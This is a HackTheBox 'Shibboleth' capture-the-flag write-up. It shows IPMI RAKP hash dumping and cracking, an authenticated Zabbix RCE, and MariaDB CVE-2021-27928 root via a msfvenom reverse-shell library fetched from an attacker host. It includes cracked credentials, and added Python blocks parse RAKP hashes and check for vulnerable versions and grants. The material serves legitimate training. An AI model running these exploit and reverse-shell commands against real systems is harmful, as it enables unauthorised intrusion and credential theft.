# HTB — Shibboleth

Misc · Medium · Linux

IPMI 2.0 cipher 0 authentication bypass via RAKP attack dumps password hash. MariaDB CVE-2021-27928 RCE and Zabbix for lateral movement.

January 26, 2025 · HackTheBox

#IPMI #RAKP #MariaDB #CVE-2021-27928
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.124
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 11:35 EST
Nmap scan report for 10.10.11.124
Host is up (0.026s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.10 - 5.15
Network Distance: 2 hops
Service Info: Host: shibboleth.htb

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   23.91 ms 10.10.14.1
2   24.04 ms 10.10.11.124
```

## udp scan

```sh
sudo nmap -sU -sV -sC -p U:161,162,53,22,110,143,623,993,995 10.10.11.124
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 12:35 EST
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.019s latency).

PORT    STATE  SERVICE  VERSION
22/udp  closed ssh
53/udp  closed domain
110/udp closed pop3
143/udp closed imap
161/udp closed snmp
162/udp closed snmptrap
623/udp open   asf-rmcp
993/udp closed imaps
995/udp closed pop3s
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.95%I=7%D=1/26%Time=67967264%P=x86_64-pc-linux-gnu%r(ipm
SF:i-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\x01
SF:\x97\x04\x03\0\0\0\0\t");
```

## vhost ffuf
```sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://shibboleth.htb/ -H 'Host: FUZZ.shibboleth.htb' -fw 18

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shibboleth.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.shibboleth.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 18
________________________________________________

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 31ms]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 34ms]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 35ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1652 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
```

## 623/udp

```sh
623/udp open asf-rmcp
```

## dumping IPMI hashes
```sh
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124
rhosts => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:b7abc698820100005aa281965e477f6c112a2fbd029ec4a2c75803129b082f63e91f6bccfadae6d4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:32c86a630ca7e14ce0d72cf801efe327f9ee6285
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## hashcat
```sh
hashcat -m 7300 oracle_nts_hash.txt /usr/share/wordlists/rockyou.txt
b7abc698820100005aa281965e477f6c112a2fbd029ec4a2c75803129b082f63e91f6bccfadae6d4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:32c86a630ca7e14ce0d72cf801efe327f9ee6285:ilovepumkinpie1
```

## creds

Administrator:ilovepumkinpie1

- creds working for http://zabbix.shibboleth.htb
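The dumped line above is hashcat's mode 7300 input: everything between the two colons is the RAKP Message 2 session data the BMC signed, and the trailing 20 bytes are an HMAC-SHA1 keyed with the account's password. The BMC hands that authenticator to whoever opens a session, before the client has proved anything, which is why a reachable 623/udp is enough to obtain an offline-verifiable hash. The Python below is an added illustration, not part of the original writeup: it splits the dump into its RAKP fields (boundaries follow the IPMI 2.0 RAKP Message 2 layout) and shows the authenticator is reproducible from the password alone, using a constructed BMC password rather than the one cracked above.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Hash line exactly as ipmi_dumphashes printed it for this box (taken from the writeup).
DUMPED = (
    "Administrator:"
    "b7abc698820100005aa281965e477f6c112a2fbd029ec4a2c75803129b082f63e91f6bccfadae6d4"
    "a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72"
    ":32c86a630ca7e14ce0d72cf801efe327f9ee6285"
)


@dataclass
class Rakp2Dump:
    user: str
    sid_console: bytes   # 4-byte session ID proposed by the remote console
    sid_bmc: bytes       # 4-byte session ID assigned by the BMC
    rand_console: bytes  # 16-byte console random number
    rand_bmc: bytes      # 16-byte BMC random number
    guid_bmc: bytes      # 16-byte BMC GUID
    role: int            # requested privilege byte (0x14 = name-only lookup | Administrator)
    salt: bytes          # the complete HMAC input, as transmitted on the wire
    auth_code: bytes     # 20-byte Key Exchange Authentication Code (HMAC-SHA1)


def parse_dump(line: str) -> Rakp2Dump:
    """Split an ipmi_dumphashes / hashcat -m 7300 line into its RAKP Message 2 fields."""
    user, salt_hex, mac_hex = line.split(":")
    salt, mac = bytes.fromhex(salt_hex), bytes.fromhex(mac_hex)
    if len(salt) < 58 or len(mac) != 20:
        raise ValueError("line does not look like a RAKP2 dump")
    name_len = salt[57]
    name = salt[58:58 + name_len].decode("ascii")
    if name != user or len(salt) != 58 + name_len:
        raise ValueError("user name field does not match the dumped user")
    return Rakp2Dump(
        user=user,
        sid_console=salt[0:4],
        sid_bmc=salt[4:8],
        rand_console=salt[8:24],
        rand_bmc=salt[24:40],
        guid_bmc=salt[40:56],
        role=salt[56],
        salt=salt,
        auth_code=mac,
    )


def bmc_auth_code(password: str, salt: bytes) -> bytes:
    """What the BMC places in RAKP Message 2: HMAC-SHA1 keyed with the user's password
    over the session data. It is sent before the console has authenticated at all."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def password_reproduces_dump(dump: Rakp2Dump, candidate: str) -> bool:
    """The offline check hashcat -m 7300 performs: does this password explain the auth code?"""
    return hmac.compare_digest(bmc_auth_code(candidate, dump.salt), dump.auth_code)


def simulate_bmc_dump(password: str, template: str = DUMPED) -> str:
    """Constructed for the demonstration: the line a BMC configured with `password`
    would leak for the same session data as the real dump."""
    user, salt_hex, _ = template.split(":")
    return f"{user}:{salt_hex}:{bmc_auth_code(password, bytes.fromhex(salt_hex)).hex()}"


if __name__ == "__main__":
    d = parse_dump(DUMPED)
    print(f"user={d.user} role=0x{d.role:02x} bmc_guid={d.guid_bmc.hex()}")
    sim = parse_dump(simulate_bmc_dump("constructed-bmc-password"))
    print("reproduced:", password_reproduces_dump(sim, "constructed-bmc-password"))
```

Because the authenticator is keyed only by the password and the protocol cannot rate-limit offline guessing, the defensive levers are not exposing the BMC network interface at all and using long random BMC passwords that are not reused elsewhere; on this box the same password also worked for the Zabbix web login and the `ipmi-svc` shell account.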
## Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)

- wait a minute or so to receive a shell

```sh
python3 50816.py http://zabbix.shibboleth.htb Administrator ilovepumkinpie1 10.10.14.13 1234
```

## shell as zabbix
```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.124] 35748
sh: 0: can't access tty; job control turned off
$ whoami
zabbix
```

## password reuse for ipmi-svc
```sh
zabbix@shibboleth:/home$ su ipmi-svc
su ipmi-svc
Password: ilovepumkinpie1
whoami
ipmi-svc
```

## user.txt
```sh
ipmi-svc@shibboleth:~$ cat user.txt
cat user.txt
107e25a4...
```

## priv esc
```sh
ipmi-svc@shibboleth:/home$ uname -a
uname -a
Linux shibboleth 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
```

```sh
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
```

```sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp   0 0 127.0.0.53:53  0.0.0.0:* LISTEN -
tcp   0 0 0.0.0.0:10050  0.0.0.0:* LISTEN -
tcp   0 0 0.0.0.0:10051  0.0.0.0:* LISTEN -
tcp   0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6  0 0 :::10050       :::*      LISTEN -
tcp6  0 0 :::10051       :::*      LISTEN -
tcp6  0 0 :::80          :::*      LISTEN -
```

## CVE-2021-27928 (10.3.25-MariaDB)

- https://github.com/Al1ex/CVE-2021-27928
```sh
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
MySQL user: root
```
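CVE-2021-27928 is an untrusted-search-path bug: a database account holding SUPER can point `wsrep_provider` (or `wsrep_notify_cmd`) at an arbitrary shared object, which the mysqld process then loads with its own privileges. The two preconditions to audit for are therefore an unpatched server and an application account that holds SUPER on `*.*`. The Python below is added here as a defender-side check and is not part of the writeup: it parses the version banner above against the first fixed release on each branch named in the MariaDB advisory (10.2.37, 10.3.28, 10.4.18, 10.5.9) and flags SUPER-capable accounts in constructed `SHOW GRANTS` output (the box's real grants are not shown on this page).

```python
import re
from typing import Iterable, Optional

# First release on each branch that contains the fix for CVE-2021-27928
# (wsrep_provider / wsrep_notify_cmd untrusted search path), per the MariaDB advisory.
FIXED_IN = {
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}

# Banner as printed by linpeas on this box (from the writeup).
BANNER = ("mysql Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) "
          "using readline 5.2")

# Constructed SHOW GRANTS output for the demonstration; not taken from the box.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'zabbix'@'localhost' IDENTIFIED BY PASSWORD '<redacted>'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `zabbix`.* TO 'zabbix_ro'@'localhost'",
    "GRANT SUPER, PROCESS ON *.* TO 'monitor'@'127.0.0.1'",
]


def parse_mariadb_version(banner: str) -> tuple:
    """Extract (major, minor, patch) from a `mysql --version` style banner."""
    m = re.search(r"Distrib (\d+)\.(\d+)\.(\d+)-MariaDB", banner)
    if not m:
        raise ValueError("not a MariaDB client banner")
    return tuple(int(x) for x in m.groups())


def vulnerable_to_cve_2021_27928(version: tuple) -> Optional[bool]:
    """True/False for the branches the advisory names; None when the branch is not
    covered by the table above (e.g. 10.1 or older), so a caller never assumes safety."""
    branch = version[:2]
    if branch in FIXED_IN:
        return version < FIXED_IN[branch]
    if branch > (10, 5):
        return False  # 10.6 and later were released after the fix landed
    return None


# Only grants on *.* can carry SUPER; database-scoped grants are skipped on purpose.
GRANT_RE = re.compile(r"^GRANT (.+?) ON \*\.\* TO '([^']+)'@'([^']+)'")


def accounts_with_super(grant_lines: Iterable[str]) -> list:
    """Accounts able to run SET GLOBAL wsrep_provider: SUPER or ALL PRIVILEGES on *.*."""
    hits = []
    for line in grant_lines:
        m = GRANT_RE.match(line)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "SUPER" in privs or "ALL PRIVILEGES" in privs:
            hits.append(f"{m.group(2)}@{m.group(3)}")
    return hits


if __name__ == "__main__":
    v = parse_mariadb_version(BANNER)
    print(f"MariaDB {'.'.join(map(str, v))} vulnerable: {vulnerable_to_cve_2021_27928(v)}")
    print("accounts with SUPER on *.*:", accounts_with_super(SAMPLE_GRANTS))
```

On this box both conditions hold: 10.3.25 is below 10.3.28, and the `SET GLOBAL wsrep_provider` step later in the writeup only succeeds because the `zabbix` database account has SUPER. A monitoring application needs privileges on its own schema only, so the grant is the cheaper of the two things to fix.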
```sh
╔══════════╣ Analyzing Zabbix Files (limit 70)
-rw-r----- 1 root ipmi-svc 21863 Apr 24  2021 /etc/zabbix/zabbix_server.conf
LogFile=/var/log/zabbix/zabbix_server.log
LogFileSize=0
PidFile=/run/zabbix/zabbix_server.pid
SocketDir=/run/zabbix
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
SNMPTrapperFile=/var/log/snmptrap/snmptrap.log
Timeout=4
AlertScriptsPath=/usr/lib/zabbix/alertscripts
ExternalScripts=/usr/lib/zabbix/externalscripts
FpingLocation=/usr/bin/fping
Fping6Location=/usr/bin/fping6
LogSlowQueries=3000
StatsAllowedIP=127.0.0.1
```

## mysql creds

zabbix:bloooarskybluh
```sh
ipmi-svc@shibboleth:/etc/zabbix$ mysql -u 'zabbix' -p''
```

```sh
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| zabbix             |
+--------------------+
2 rows in set (0.000 sec)
```

```sh
MariaDB [(none)]> use zabbix;
```

```sh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=1235 -f elf-so -o CVE-2021-27928.so
```

```sh
ipmi-svc@shibboleth:~$ wget http://10.10.14.13/CVE-2021-27928.so
```

```sh
MariaDB [(none)]> SET GLOBAL wsrep_provider="/home/ipmi-svc/CVE-2021-27928.so";
```

```sh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.124] 52638
whoami
root
```

## root.txt

```sh
cat root.txt
9dcdaaf4...
```